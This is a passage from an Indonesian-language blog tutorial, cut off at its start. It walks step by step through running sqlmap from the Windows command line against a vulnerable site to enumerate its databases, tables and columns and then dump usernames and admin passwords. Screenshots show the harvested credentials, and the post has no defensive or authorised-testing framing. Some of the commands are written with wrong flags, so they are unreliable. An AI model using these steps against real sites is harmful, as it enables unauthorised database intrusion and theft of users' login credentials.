banyak kok di google kawan anggreks"2.buat yang belum punya program python monggo silahkan download download yang 2.3.7
3.Kalo udah selsai , download SQLMAP python nya. lalu simpan di direktori PC teman "Bebas mau di taruh dimana aja D/C "
4.Buka dan tujulah ke direktori penyimpanan anda tadi "Contoh"
perintah tuju direktori dengan CMD :
d: <<< untuk menuju data d
c: <<< untuk menuju data c
cd : menggali lebih dalam direktori.Misal nya saya, menyimpan di D:\Data-gw\Penetrasi\sqlmap . makanya saya harus menggali nya dengan perintah cd "sebagai contoh : cd data-gw ENTER, cd penetrasi ENTER , cd sqlmap ENTER.
Lihat gambar berikut ini
:![[Image: TujuDirektoridenganCmd.png]](http://2.bp.blogspot.com/--0IMgQ4ue28/T6604I4VFBI/AAAAAAAAATg/wvMi4vfY-hg/s1600/TujuDirektoridenganCmd.png)
Mudahkan
... 5.Nah kalo sudah di tuju direktori nya,Silahkan masukan syntax berikut ini : sqlmap.py -u SiteVuln --dbs ENTER (Untuk mencari database) "Maka akan jadi seperti gambar di bawah ini"
Mohon maaf , kalo gambar nya BWK :
![[Image: MencariDbs.png]](http://3.bp.blogspot.com/-2GqlnoCYWyc/T6-XTCaBfPI/AAAAAAAAATw/p6T-X78mi8w/s1600/MencariDbs.png)
6.Sekarang kita menggali tabel dari Dbs , " BUG " , masukan perintah : sqlmap.py -u SiteVuln --d database nya --tables
ENTER , Nah Munculkan banyak kan tuh
, table dari Database nyauntuk lebih jelasnya Lihat gambar di bawah ini :
![[Image: EksekusiUser.png]](http://3.bp.blogspot.com/-G1QqYvogmVo/T6-faq_bzdI/AAAAAAAAAUQ/FwiBt8quzPA/s1600/EksekusiUser.png)
7.Selanjut nya adalah, menemukan kolom nya.Silahkan masukan sintaks nya lagi :
sqlmap.py -u SiteVuln -D DataBase nya -D tabel nya --columns ,, Oke kalo udah Enter lagi , dan lihat hasil nya :
![[Image: udah%2Bmenemukanuser%252Bpassadmin.png]](http://4.bp.blogspot.com/-jPlhrud6pXc/T6-kg9Xr9rI/AAAAAAAAAUg/rnEwuuIGV04/s1600/udah%2Bmenemukanuser%252Bpassadmin.png)
Ea kk , jangan berbahagia dulu
soalnya kita kan gaktau username + password siapa yang kita dapet "syukur2x kalo si admin yang kita dapet" kalo user biasa gimana 
Biar gak penasaran , lanjut ke step berikut nya 8.Melihat isi dari kolom tersebut
Seperti biasa masukan sintaks lagi, sintakz nya adalah :sqlmap.py -u SiteVuln -D Nama databasenya -T Nama tablenya -C nama kolomnya --dump
Sebagai contoh gambar di atas , saya akan mengambil username nya password nya belakangan
. Setelah kita mendapatkan username nya, lakukan hal yang sama untuk mendapatkan password dengan sintaks di atas. maka akan seperti ini jadi nya "contoh gambar" :![[Image: Berhasil%2Bmendapatkan%2Busername%252Bpa...Badmin.png]](http://3.bp.blogspot.com/-HqatD00P-OQ/T6-qFCTxlJI/AAAAAAAAAUw/miYmobDMNDU/s1600/Berhasil%2Bmendapatkan%2Busername%252Bpassword%2Badmin.png)
SUMBER
0 comments:
Post a Comment